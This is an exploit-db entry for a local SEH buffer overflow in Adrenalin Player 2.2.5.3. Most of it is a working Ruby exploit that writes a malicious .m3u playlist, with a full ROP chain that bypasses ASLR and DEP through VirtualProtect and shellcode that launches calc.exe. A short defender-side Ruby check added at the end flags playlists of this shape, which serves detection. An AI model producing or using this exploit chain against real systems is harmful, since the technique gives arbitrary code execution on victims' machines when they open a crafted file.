Adrenalin Player 2.2.5.3 - '.m3u' Local Buffer Overflow (SEH) (ASLR + DEP Bypass)

04 Feb 2014 | Reported by Muhamad Fadzil Ramli | Type: exploitdb | Source: www.exploit-db.com

Adrenalin Player 2.2.5.3 local buffer overflow exploit with ASLR and DEP bypass

Code
#!/usr/bin/env ruby
# encoding: binary
# (all string literals below are raw bytes; without this, Ruby 1.9+ raises
#  Encoding::CompatibilityError when the binary ROP chain and shellcode are joined)
# Exploit Title: Adrenalin Player 2.2.5.3 (.m3u) SEH-Buffer Overflow ASLR+DEP Bypass
# Date: 3/2/2014
# Exploit Author: Muhamad Fadzil Ramli
# Vendor HomePage: http://software.naver.com/software/summary.nhn?softwareId=MFS_100099
# Software Link: http://software.naver.com/software/summary.nhn?softwareId=MFS_100099
# Version App: 2.2.5.3
# Tested on: Windows 7 x86 - Version 6.1.7600
# CVE:None
# Notes:-
# Offset to kernel32 - 0xF8C
# Offset to virtualProtect - 0xC039

filename = "motiv.m3u"

rop = ''
rop << [0x10129df6].pack('V')		# PUSH ESP # POP ESI # RETN 0x10
rop << [0x10135eaf].pack('V') * 5	# RETN
rop << [0x1010c4c2].pack('V')		# ADD ESP,20 # RETN

rop << 'VVVV'						# VirtualProtect()
rop << 'WWWW'                 		# return address
rop << 'XXXX'                 		# lpAddress
rop << 'YYYY'                 		# dwSize
rop << 'ZZZZ'                 		# flNewProtect
rop << [0x1024bb98].pack('V')		# lpOldProtect - writeable address
rop << [0x10135eaf].pack('V') * 2	# RETN (ROP NOP)

# kernel32 address
rop << [0x1003de9f].pack('V')		# PUSH ESI # POP EAX # MOV EAX,ESI # POP EDI # RETN
rop << "AAAA"						# FILLER
rop << [0x1005de8e].pack('V')		# XCHG EAX,EBP # RETN
rop << [0x1012014d].pack('V')		# XOR EAX,EAX # RETN
rop << [0x101201d6].pack('V')		# POP EAX # RETN
rop << [0xFFFFF074].pack('V')		# OFFSET F8C
rop << [0x101111e2].pack('V')		# NEG EAX # RETN
rop << [0x1013a5e4].pack('V')		# ADD EAX,EBP # RETN
rop << [0x1010010f].pack('V')		# POP ECX # RETN
rop << [0xFFFFFFFF].pack('V')		#
rop << [0x1012dd87].pack('V')		# MOV EAX,DWORD PTR DS:[EAX] # ADD EAX,ECX # RETN
rop << [0x1012014b].pack('V')		# INC EAX # RETN
# virtualProtect Address
rop << [0x1002660b].pack('V')		# XCHG EAX,ECX # MOV EDX,5E5F0002 # POP EBP # POP EBX # RETN 0x0C
rop << "XXXX" * 2					# FILLER
rop << [0x1012014d].pack('V')		# XOR EAX,EAX # RETN
rop << "AAAA" * 3					# FILLER
rop << [0x101201d6].pack('V')		# POP EAX # RETN
rop << [0xFFFF3FC7].pack('V')		# OFFSET C039 (negated to avoid null bytes)
rop << [0x101111e2].pack('V')		# NEG EAX # RETN
rop << [0x1002660b].pack('V')		# XCHG EAX,ECX # MOV EDX,5E5F0002 # POP EBP # POP EBX # RETN 0x0C
rop << "AAAA" * 2					# FILLER
rop << [0x1013c584].pack('V')		# SUB EAX,ECX # RETN
rop << [0x1010010f].pack('V')		# POP ECX # RETN
rop << [0xFFFFFFFF].pack('V')		#
rop << [0x1012dd87].pack('V')		# MOV EAX,DWORD PTR DS:[EAX] # ADD EAX,ECX # RETN

# assign virtualprotect address
rop << [0x1006798b].pack('V') * 8	# INC ESI # RETN
rop << [0x1010eac7].pack('V')		# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
rop << "AAAA"						# FILLER

# return address
rop << [0x10117105].pack('V')		# PUSH EAX # POP ESI # POP EBX # RETN
rop << [0x10135eaf].pack('V')		# FILLER
rop << [0x1014b57f].pack('V')		# ADD EAX,100 # POP EBP # RETN
rop << [0x10135eaf].pack('V')		# FILLER
rop << [0x1014b57f].pack('V')		# ADD EAX,100 # POP EBP # RETN
rop << [0x10135eaf].pack('V')		# FILLER
rop << [0x1006798b].pack('V') * 4	# INC ESI # RETN
rop << [0x1010eac7].pack('V')		# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
rop << "AAAA"

# lpAddress
rop << [0x10117105].pack('V')		# PUSH EAX # POP ESI # POP EBX # RETN
rop << [0x10135eaf].pack('V')		# FILLER
rop << [0x1014b57f].pack('V')		# ADD EAX,100 # POP EBP # RETN
rop << [0x10135eaf].pack('V')		# RETN FILLER
rop << [0x1014b57f].pack('V')		# ADD EAX,100 # POP EBP # RETN
rop << [0x10135eaf].pack('V')		# FILLER
rop << [0x1006798b].pack('V') * 4	# INC ESI # RETN
rop << [0x1010eac7].pack('V')		# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
rop << "AAAA"						# FILLER

# dwSize
rop << [0x10117105].pack('V')		# PUSH EAX # POP ESI # POP EBX # RETN
rop << [0x10135eaf].pack('V')		# FILLER
rop << [0x1012014d].pack('V')		# XOR EAX,EAX # RETN
rop << [0x101201d6].pack('V')		# POP EAX # RETN
rop << [0xfffffcff].pack('V')		# -0x301; NEG yields dwSize 0x301 (0x300 would contain a null byte)
rop << [0x101111e2].pack('V')		# NEG EAX # RETN
rop << [0x1006798b].pack('V') * 4	# INC ESI # RETN
rop << [0x1010eac7].pack('V')		# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
rop << "AAAA"

# flNewProtect
rop << [0x10117105].pack('V')		# PUSH EAX # POP ESI # POP EBX # RETN
rop << [0x10135eaf].pack('V')		# RETN FILLER
rop << [0x1012014d].pack('V')		# XOR EAX,EAX # RETN
rop << [0x101201d6].pack('V')		# POP EAX # RETN
rop << [0xffffffc0].pack('V')		# 40
rop << [0x101111e2].pack('V')		# NEG EAX # RETN
rop << [0x1006798b].pack('V') * 4	# INC ESI # RETN
rop << [0x1010eac7].pack('V')		# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
rop << "AAAA"

# Execute VirtualProtect
rop << [0x101263a0].pack('V')		# XCHG EAX,ESP # RETN

# payload: runs calc.exe via WinExec (resolves it from the kernel32 export table)
sc =
"\x66\x81\xE4\xFC\xFF\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52" +
"\x56\x64\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E" +
"\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C" +
"\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF5\x0F" +
"\xB7\x54\x51\xFE\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7\xCC"

xploit = rop
xploit << "\x90" * 256
xploit << sc

data = "A" * 2176
data[24,xploit.length] = xploit
data[2172+4,4] = [0x100d7aec].pack("V") # SEH - STACK PIVOT

# open in binary mode so no byte of the buffer is altered by newline translation
File.open(filename, 'wb') do |fd|
    fd.write data
    puts "exploit file size : #{data.length}"
end
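As an added defender-side example (not part of the original exploit-db entry), a small Ruby triage check that flags the shape of the crash file above: an .m3u entry that is far longer than any path or URL, contains non-printable bytes, and carries the SEH-offset value used by this exploit. The 2176-byte SEH offset and the 0x100d7aec pivot value come from the script above; the MAX_ENTRY threshold and the sample playlists are assumptions constructed for the example.

```ruby
# Triage helper for suspicious .m3u playlists (added example, not the original exploit code).
SEH_OFFSET = 2176         # offset at which the exploit above overwrites the SEH handler
PIVOT_ADDR = 0x100d7aec   # handler value (stack-pivot gadget) written by the exploit above
MAX_ENTRY  = 1024         # assumed: no legitimate path or URL entry is this long

# Returns an array of human-readable findings for one playlist body (a String of bytes).
def triage_m3u(bytes)
  findings = []
  bytes.b.each_line.with_index(1) do |line, n|
    entry = line.chomp
    next if entry.empty? || entry.start_with?('#')   # skip directives and comments

    if entry.bytesize > MAX_ENTRY
      findings << "line #{n}: entry length #{entry.bytesize} exceeds #{MAX_ENTRY}"
    end

    nonprint = entry.each_byte.count { |b| b < 0x20 || b > 0x7e }
    findings << "line #{n}: #{nonprint} non-printable bytes" if nonprint > 0

    # If the entry reaches the SEH offset, decode the 4 bytes that would land on the handler.
    if entry.bytesize >= SEH_OFFSET + 4
      handler = entry[SEH_OFFSET, 4].unpack1('V')
      note = handler == PIVOT_ADDR ? ' (matches known stack-pivot gadget)' : ''
      findings << format('line %d: bytes at SEH offset read as 0x%08x%s', n, handler, note)
    end
  end
  findings
end

# Constructed samples: a benign playlist and a reconstruction of the crash file layout.
BENIGN = "#EXTM3U\n#EXTINF:123,Sample\nC:\\Music\\track01.mp3\nhttp://example.invalid/stream.mp3\n"
crash = 'A' * SEH_OFFSET
crash << [PIVOT_ADDR].pack('V')
CRASH = crash

if __FILE__ == $0
  puts "benign playlist: #{triage_m3u(BENIGN).empty? ? 'no findings' : 'findings'}"
  puts triage_m3u(CRASH)
end
```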
